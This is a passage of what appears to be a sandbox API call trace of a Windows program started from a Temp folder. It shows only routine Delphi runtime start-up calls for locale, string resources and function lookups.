7") returned 0x9 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0108.388] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.388] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.388] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0108.388] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0108.388] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0108.388] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.388] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] GetThreadLocale () returned 0x409 [0108.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0108.389] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0108.389] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.389] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0108.389] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0108.389] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2a4470 [0108.389] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0108.389] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0108.389] GetLastError () returned 0x7a [0108.389] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0108.389] GetCurrentThreadId () returned 0xcb8 [0108.389] GetCurrentThreadId () returned 0xcb8 [0108.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0108.389] GetThreadLocale () returned 0x409 [0108.390] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0108.390] GetThreadLocale () returned 0x409 [0108.390] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0108.390] GetCurrentThreadId () returned 0xcb8 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0108.391] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0108.392] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0108.392] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0108.392] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0108.392] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16518143451) returned 1 [0108.392] GetTickCount () returned 0x25f00 [0108.392] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x15, wMilliseconds=0x34b)) [0108.392] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x15, wMilliseconds=0x34b)) [0108.392] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16518157563) returned 1 [0108.392] GetTickCount () returned 0x25f00 [0108.392] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x15, wMilliseconds=0x34b)) [0108.392] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x15, wMilliseconds=0x34b)) [0108.392] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0108.392] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0108.393] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0108.393] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0108.393] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0108.393] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0108.393] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0108.394] GetThreadLocale () returned 0x409 [0108.394] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0108.394] GetCurrentThreadId () returned 0xcb8 [0108.394] GetCurrentThreadId () returned 0xcb8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0108.394] GetThreadLocale () returned 0x409 [0108.394] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0108.394] GetThreadLocale () returned 0x409 [0108.394] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0108.394] GetCurrentThreadId () returned 0xcb8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 